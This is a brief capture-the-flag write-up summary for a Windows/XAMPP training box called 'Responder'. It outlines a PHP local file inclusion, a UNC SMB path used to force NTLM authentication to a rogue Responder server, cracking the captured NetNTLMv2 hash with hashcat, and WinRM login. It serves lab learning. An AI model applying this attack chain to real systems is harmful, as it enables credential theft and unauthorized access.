Responder

Box info | OS: Windows 10 Pro Build 19042 (XAMPP / Apache 2.4.52) | Difficulty: Very Easy | Tier: 1 | Status: Starting Point Skills: LFI, PHP include, UNC SMB path, Responder, NetNTLMv2, hashcat Pwned: 2026-04-28 TL;DR Responder is a Windows box running PHP on XAMPP. The web application at unika.htb uses include($_GET['page']) without any input sanitization — a textbook LFI. Reading the source code via php://filter confirms the vulnerability. HTTP RFI is blocked (allow_url_include=0), but SMB RFI works: PHP on Windows handles UNC paths (\\attacker\share\file) natively via include(). Setting up the Responder tool as a rogue SMB server and triggering the UNC include forces the target machine to authenticate with its NTLM credentials. The captured NetNTLMv2 hash for RESPONDER\Administrator cracks in under a second with hashcat against a common wordlist: badminton. WinRM on port 5985 grants a full PowerShell session. The flag is on mike’s desktop. ...